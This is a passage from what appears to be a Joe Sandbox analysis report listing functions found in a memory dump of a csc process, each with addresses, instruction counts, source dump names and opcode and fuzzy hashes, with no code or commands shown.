                                                                                                                                                                                                                                                                                  • Instruction ID: c47f1ecdc69aa03dd9a472039e8cdc60ac027b3fe01da2e352e7855387a20c28
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 57456c4ab62d1bffaae4e0a987824a1f22904b8bbada450ec9475259772cb227
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C241AC75A01705CFCB24DF24C994A69BBF3FF44324F508AAAD4469B6A0DB30EB81DB41
                                                                                                                                                                                                                                                                                  Function 05C91796 Relevance: .1, Instructions: 112COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 7d7c97a695f2ba4c0439bd6665d011803e58fdaf025f2aae182f3eb826becd07
                                                                                                                                                                                                                                                                                  • Instruction ID: 8b2431dfced29d05000aa56d78cc9e3ae59c0f85c64ba69a96e23d70c9318499
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d7c97a695f2ba4c0439bd6665d011803e58fdaf025f2aae182f3eb826becd07
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42419D75A04205DFCB09CF5DD481BADBBF1FB48700F19896AE905EB344C734A941CB90
                                                                                                                                                                                                                                                                                  Function 05C64779 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: f52981a492d6046a716f5bd37305cdc7f96fc3ae7d85e297a47871f69c062baf
                                                                                                                                                                                                                                                                                  • Instruction ID: 1322abb367ebbb6c236900bb721aeb93a309e82139fe120c632db5b3e4cf2901
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f52981a492d6046a716f5bd37305cdc7f96fc3ae7d85e297a47871f69c062baf
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E841A0706043418BDB29DF28D8D8B3ABBEAFF85750F14496DE542C72A1DB30DA45CB91
                                                                                                                                                                                                                                                                                  Function 05C701F1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                                                                                                                                                                                                                  • Instruction ID: f1854e6e92d78af3fa87b89f27f3860183199b093f7c27a881e67a7033ad194b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60217219fab30d7d5fc2cb2f90293db42116593f581b72c7076c745c3ea74110
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3317F32604248AFCB11CB79CC88B9ABFF9FF00350F0489A5E855E7752C6749944CB65
                                                                                                                                                                                                                                                                                  Function 05C89194 Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 4b7ad929c0a29097c09825905f26fc04a9fe196d84040f242c343bfc71e42524
                                                                                                                                                                                                                                                                                  • Instruction ID: b03d5d135c3c03362a9e2f26d082f941a568f4d006dfd8409a0867bf61755b25
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b7ad929c0a29097c09825905f26fc04a9fe196d84040f242c343bfc71e42524
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0331A272B042299FDB21DB28CC44FBABBB5EF85714F0109E9E94DA7240CB709E848F51
                                                                                                                                                                                                                                                                                  Function 05C65622 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 98002ac3d0eabd675bd2f254a4170f4467e81249d8638b2607d115417479853e
                                                                                                                                                                                                                                                                                  • Instruction ID: bfcce8ea6f2b42117e46533c14b0d550f06e96f95f73e2c9ad231154c96f2b8b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98002ac3d0eabd675bd2f254a4170f4467e81249d8638b2607d115417479853e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0831D031301A02EFCB51EF25C988EAEFBA6FF44714F504959E90187B50DB70EA20DB90
                                                                                                                                                                                                                                                                                  Function 05C866E0 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                                                                                                                                                                                                                  • Instruction ID: 94218372f311f365474e5ed392aaa747683ee5cf7ccdf24745bba09eb6a37db7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3b5ea768f5c6f27d87bba895ac2d90d9c232eb6d903ecbccf215107f60aedf4c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8A419272600A45DFC732DF15C944FAA7BA5FB84B20F04497CE55A8BAA0CB35ED41EB90
                                                                                                                                                                                                                                                                                  Function 05C64180 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fd5c912c7d6a9143735b34ba030558f7454c32b72a230eeb9fbedbcf3fb2a72a
                                                                                                                                                                                                                                                                                  • Instruction ID: aa94dc13e2c29d2efd6ddfa3ddebda745d50143ceb4cf75763bb5bac2911ef41
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd5c912c7d6a9143735b34ba030558f7454c32b72a230eeb9fbedbcf3fb2a72a
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 29419A71604B44DFC726CF28C4C9B9ABBE5BB44714F018C6EE95A9B250EB74EA44CB90
                                                                                                                                                                                                                                                                                  Function 05C5B420 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: bc8aaab05ca1da9a2e64f372c64ede8dc410411a17bb6fd459942763c0187a7e
                                                                                                                                                                                                                                                                                  • Instruction ID: 2f9307183b09d99cf9a40590c5e72536ae412fa6a87fccfa3edde1df64859cc7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc8aaab05ca1da9a2e64f372c64ede8dc410411a17bb6fd459942763c0187a7e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E531F6726002089FC722DF54C480E667BA5FF45328F144A6AFD464F291D731ED81CBD4
                                                                                                                                                                                                                                                                                  Function 05CDE79D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 6cd9f076c8cb1de705288d55f73c9dbfd66a92455120deb226996868989b9084
                                                                                                                                                                                                                                                                                  • Instruction ID: dc5e7b91a587ba011dc323a8a034ca7ecfeb37800b51ec328a813af5e2228dc0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6cd9f076c8cb1de705288d55f73c9dbfd66a92455120deb226996868989b9084
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A031A0317456C19BE326A75D8D4CB25B7DCBB41B44F1A0CA0AA06DF6D1DB68D940D231
                                                                                                                                                                                                                                                                                  Function 05C596E0 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5fff096cd01079459e5059515d2607d4606b4eca6f4939313af9f26b0c47b884
                                                                                                                                                                                                                                                                                  • Instruction ID: 869fa0b0fe0dae1be73a8e79e17278fd205e77f871699b7073395ededbbc2877
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5fff096cd01079459e5059515d2607d4606b4eca6f4939313af9f26b0c47b884
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C21D676A00714EFD7219FA88444B1ABBB5FB84BA4F110C6AEA159B340DB70DD40D794
                                                                                                                                                                                                                                                                                  Function 05C606CF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 03ea3c67e01b16f29538f7f942e4e076b5c1825d61d85bee5ae877fe36cbb5e3
                                                                                                                                                                                                                                                                                  • Instruction ID: 64937d560a6d809d0d5c272d90d7f32d4dd476a3e0b1eb4a9eb5c018e63a3a09
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03ea3c67e01b16f29538f7f942e4e076b5c1825d61d85bee5ae877fe36cbb5e3
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C131A4766047019BC712DE6488DCDABBBBABB84660F014D29FC15B7210EA30DE019BA2
                                                                                                                                                                                                                                                                                  Function 05C68470 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 85aa0019826c4e14215c6e9f109a230ca5fbb3d3a6fbd5cdd369541bdf05318f
                                                                                                                                                                                                                                                                                  • Instruction ID: 618f7dda509c41245903922787b15e69959ffcf10cb65a7edd00f99f419c4126
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85aa0019826c4e14215c6e9f109a230ca5fbb3d3a6fbd5cdd369541bdf05318f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F317C726093418FD320CF1AC854B26BBE5FB88700F094DADE989D7391D7B4EA44CB91
                                                                                                                                                                                                                                                                                  Function 05C5D64A Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                                                                                                                                                                                                                  • Instruction ID: 9910a9c4592732c6eea3557c338c53f08dcaf78f38475cd25af6c088179f5a0b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e305e0d7f41ac056458eddf92bc4299b25b47a72481478b7a5e1aaa482e8e8be
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C31F976600305AFDB21CE98C980F6A73B5EB40764F154C29EC078B204DB74DF85CB94
                                                                                                                                                                                                                                                                                  Function 05C9A5E7 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                                                                                                                                                                                                                  • Instruction ID: 9375974294f55e0ab2f631c86f2942a9fc2c0178eb0ebd11ec74b52051a27e90
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 241b8a829ca63ffa8a9ef5e05c64435535f197a1a802660e6b21c643b4a54232
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 89311C72B04B41AFDB64CF6ADD49B57B7F8BB08B54F04492DA59AC3650E730E900CB64
                                                                                                                                                                                                                                                                                  Function 05C656E0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 670efdaf2114d27e0ce5d865d99f6686f4bd174006326217edf48db18bb9d3c8
                                                                                                                                                                                                                                                                                  • Instruction ID: 070f9456a68f136b3c47bafff5ab39500dc0ad6a2dc45cbef65eb9fb0d79e6a1
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 670efdaf2114d27e0ce5d865d99f6686f4bd174006326217edf48db18bb9d3c8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7831CC35725A05FFDB05DF25CA88E69BBA6FF84200F905899EC0187B50CB35EA30DB81
                                                                                                                                                                                                                                                                                  Function 05D317BC Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                                                                                                                                                                                  • Instruction ID: 3079389e944cb2898193b44faf91a9a837c99a95a6e5e3d9fa98be5765025264
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f358b4da7ece904735c98e6deffe8cfe7244b66df3bddd27f976fef8ef0900c8
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 683170B2E00219EBC714DFA9C481AADB7F1FF58311F15816AD854DB341D734AA51CBA0
                                                                                                                                                                                                                                                                                  Function 05D0E750 Relevance: .1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 24fa423ce003994236394c8181c1c00f3fb5cf855c68a0fc898adadbfed9e10e
                                                                                                                                                                                                                                                                                  • Instruction ID: d47bcb53fca5adb4b9e89416291147b0760d1d28b430b6318008dd6f427e4394
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24fa423ce003994236394c8181c1c00f3fb5cf855c68a0fc898adadbfed9e10e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 48318DB1A053059FCB10DF19C444A6ABBEAFFC9614F449AAFE4889B251D730DD05CB92
                                                                                                                                                                                                                                                                                  Function 05C691E5 Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                                                                                                                                                                                                                  • Instruction ID: d05670d6fd63683b26e6fd3998c9541e4fb8c4cc1577aa7ca275d61691ac3078
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 28be50e18f7c6a96c4642090142a3b1f35eb08c3651d904e1aaf7ae70e460030
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F3198B66082458FCB15DF18D880A5ABBEAFF89710F0409AAFC5597360D730DE04DBA2
                                                                                                                                                                                                                                                                                  Function 05C5C0F6 Relevance: .1, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
